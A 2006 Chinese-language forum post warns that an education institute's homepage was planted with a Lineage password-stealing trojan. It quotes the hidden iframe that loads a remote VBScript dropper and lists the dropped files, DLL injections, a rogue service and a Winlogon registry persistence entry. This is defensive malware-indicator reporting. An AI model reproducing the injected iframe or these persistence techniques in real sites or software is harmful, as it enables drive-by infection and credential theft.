引用 | 編輯
upside
2006-11-03 04:28 |
樓主
▼ |
||
x0
Roger at 4:27 pm on 星期三, 十一月 1, 2006 資策會首頁(www.iiiedu.org.tw)今天被植入木馬(Lineage),到現在為止,都還未被移除,請各位小心囉。 以下是這隻木馬的行為: 1. 首頁被植入iframe “http://www. fxkfxk .com/333/us.asp” width=”0″ height=”0″ scrolling=”no” frameborder=”0″ 2. 檔案 us.asp 是一個 VBScript,它會下載或執行 us.exe。 3. 執行之後,系統會產生: [Added process] C:\WINDOWS\svchost.exe [DLL Injection] C:\WINDOWS\svchost.exe 注入某些執行程序,例如, svchost.exe 等等。 C:\WINDOWS\system32\PDLL.dll 注入某些執行程序,例如, svchost.exe、explorer.exe 等等。 C:\WINDOWS\winnt.dll 注入某些執行程序,例如, 瀏覽器等等。 C:\WINDOWS\winntKey.DLL 注入某些執行程序,例如, svchost.exe 等等。 [Added service] NAME=PigeonServer DISPLAY=PigeonServer FILE=C:\WINDOWS\winnt.exe [Drop Files] C:\Program Files\WindowsUpdate\1.exe C:\Program Files\WindowsUpdate\2.exe C:\WINDOWS\svchost.exe C:\WINDOWS\system32\PDLL.dll C:\WINDOWS\winnt.dll C:\WINDOWS\winnt.exe C:\WINDOWS\winntKey.DLL [Added Registries] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon||Value=Userinit||Data=C:\WINDOWS\system32\userinit.exe, C:\WINDOWS\svchost.exe, x0
|